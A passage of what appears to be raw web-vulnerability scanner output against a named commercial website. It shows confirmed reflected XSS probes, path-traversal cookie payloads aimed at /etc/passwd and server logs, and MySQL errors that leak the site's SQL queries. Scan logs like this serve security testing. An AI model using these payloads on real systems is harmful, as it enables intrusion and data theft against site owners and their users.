OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=u0iel7m16qf7b2hi6e3unfqfm7; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>' OR prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>' OR prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>' OR prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>' OR prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>' OR prj.project_page_url = 'leadflow/parl00/?nsextt='"--></style></script><script>netsparker(0x0005D9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005D9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DF)%3C/script%3E

/ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005DF)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005DF)</script>

Request

GET /ppc/leadflow/parl00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005DF)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ho9ee9eh4eoff7bgbjq10pv2b4; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>' OR prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>' OR prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>' OR prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>' OR prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>' OR prj.project_page_url = 'leadflow/parl00/'"--></style></script><script>netsparker(0x0005DF)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005DF)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/

/ppc/leadflow/parl00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/?'"--></style></script><script>alert(0x0005E1)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005E1)</script>

Request

GET /ppc/leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=stu5a679s5sqqmctfiojln7002; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>' OR prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>' OR prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>' OR prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>' OR prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>' OR prj.project_page_url = 'leadflow/parl00/?'"--></style></script><script>netsparker(0x0005E1)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E1)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?'"--></style></script><script>alert(0x0005DD..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005DD)</script>

Request

GET /ppc/leadflow/obtm00/project.php?'"--></style></script><script>netsparker(0x0005DD)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 